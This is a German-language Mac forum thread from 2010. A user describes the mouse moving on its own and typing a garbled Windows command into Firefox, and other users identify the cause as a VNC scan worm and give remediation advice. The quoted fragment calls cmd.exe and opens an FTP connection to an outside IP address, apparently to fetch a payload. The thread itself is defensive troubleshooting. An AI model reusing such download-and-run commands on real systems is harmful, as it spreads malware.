jazZbaR Posted October 7, 2010 Share Posted October 7, 2010 Etwas besorgniserregend, was eben passiert ist. ich war mit Firefox auf der google Seite und habe nach facebook protest gesucht. Plötzlich sprang die Maus ohne das ich etwas tat in das Suchfeld und es wurde folgender Code eingetippt 5szstemroot5#szstem32#cmd.exe del eq7echo open 190.209.51.212 1693 .. eq7echo user Eindeutig ein Windows Code, aber denoch lief die Maus über meinen Desktop als ob einer sich per TeamViewer bei mir eingeloggt hätte. Schloss Firefox und hat sich ein bisschen umgesehen. Ich hab das ganze einfach mal beobachtet, weil ich echt sprachlos war. Ich hab hier zu Hause im WLAN noch ein iPad mit dem ich gelegentlich mit iTeleport auf den Mac zugreife. Damals habe ich irgendeinen Systemserver aktiviert, damit das funktioniert. Liegt da vielleicht die Schwachstelle? Würde ungern meinen Mac plattmachen. Hat jemand eine Idee wie ich das wieder beheben kann? Link to comment Share on other sites More sharing options...
Macsilencer Posted October 8, 2010 Share Posted October 8, 2010 Etwas besorgniserregend, was eben passiert ist. ich war mit Firefox auf der google Seite und habe nach facebook protest gesucht. Plötzlich sprang die Maus ohne das ich etwas tat in das Suchfeld und es wurde folgender Code eingetippt 5szstemroot5#szstem32#cmd.exe del eq7echo open 190.209.51.212 1693 .. eq7echo user Eindeutig ein Windows Code, aber denoch lief die Maus über meinen Desktop als ob einer sich per TeamViewer bei mir eingeloggt hätte. Schloss Firefox und hat sich ein bisschen umgesehen. Ich hab das ganze einfach mal beobachtet, weil ich echt sprachlos war. Ich hab hier zu Hause im WLAN noch ein iPad mit dem ich gelegentlich mit iTeleport auf den Mac zugreife. Damals habe ich irgendeinen Systemserver aktiviert, damit das funktioniert. Liegt da vielleicht die Schwachstelle? Würde ungern meinen Mac plattmachen. Hat jemand eine Idee wie ich das wieder beheben kann? Hallo kann das sein, dass dein sog. Systemserver einige Ports frei lässt hast du in deinem MacSystem eine Firewall aktiviert...sind da Logs enthalten wo du nachschauen kannst woher das kommt? Ich jedenfalls nutze auch das iTeleport und das einige male im Tag.. schau mal im Systemeinstellungen/Freigaben Bildschirmfreigabe...welcher nutzer ist da drinn? dann Computereinstellungen: da sollte eigendlich nur das VNC aktiviert und nur dein Pers. PW drinnen sein das iTeleport funktioniert ohne weiteren zusatzserver Software oder jegleichen anderen müll eine empfehlung vielleicht.. das Netbarrier...ist ein gutes Tool für Netzwerküberwachung jeglicher art.. SG Link to comment Share on other sites More sharing options...
jazZbaR Posted October 8, 2010 Author Share Posted October 8, 2010 Ja ich habe LittleSnitch als Firewall. Aber ehrlich gesagt, befinden sich Freigaben für Apps darin, von denen wahrscheinlich die wenigsten und ich mit eingeschlossen, wissen wofür die sind. Wie z.B. nmblookup??? Unter Systemeinstellungen/Freigaben ist nur die Dateifreigabe für 2 Ordner aktiviert. Unter Optionen ist AFP, FTP und SMB aktiviert. Ich finde den Punkt gerade nicht, wo ich einstellen konnte, dass ich jederzeit über das iPad per iTeleport mich mit dem Mac verbinden kann. Irgendwo konnte ich einen Server starten, der permanent im Hintergrund läuft. Was ich nicht verstehe, falls sich ein Mac Trojaner oder eine andere Fernteuerungssoftware für den Mac bei mir eingenistet hat, warum werden dann diese Windows Codes in Firefox eingetippt. Bin echt ratlos. EDIT: Habe die Einstellung für den System Server im Vine Server App gefunden und unter Authenfication stand None Password. Hab das mal geändert. Aber sicher fühl ich mich dennoch nich, weil der Zugriff ja nur aus dem lokalen Netzwerk konfiguriert ist. Link to comment Share on other sites More sharing options...
riws Posted October 8, 2010 Share Posted October 8, 2010 VNC scan worm Link to comment Share on other sites More sharing options...
jazZbaR Posted October 9, 2010 Author Share Posted October 9, 2010 Vielen Dank für den Link. Das war schon mal ganz informativ. Habe jetzt den Vine System Server mit einem sehr starken Passwort und SSH geschützt. Hoffe das Hilft erstmal. Wenn ich das richtig verstanden habe, schnüffelt eine Bot nach offenen VNC Ports und führt dann mit der cmd.exe diese Codes aus. Da ich Mac nutze funktioniert das dann nicht? Muss ich noch eine besondere "Desinfizierung" vornehmen? THX Link to comment Share on other sites More sharing options...
Macsilencer Posted October 10, 2010 Share Posted October 10, 2010 Probier man den hier aus http://www.clamxav.com/index.php?page=v2beta SG Link to comment Share on other sites More sharing options...
Recommended Posts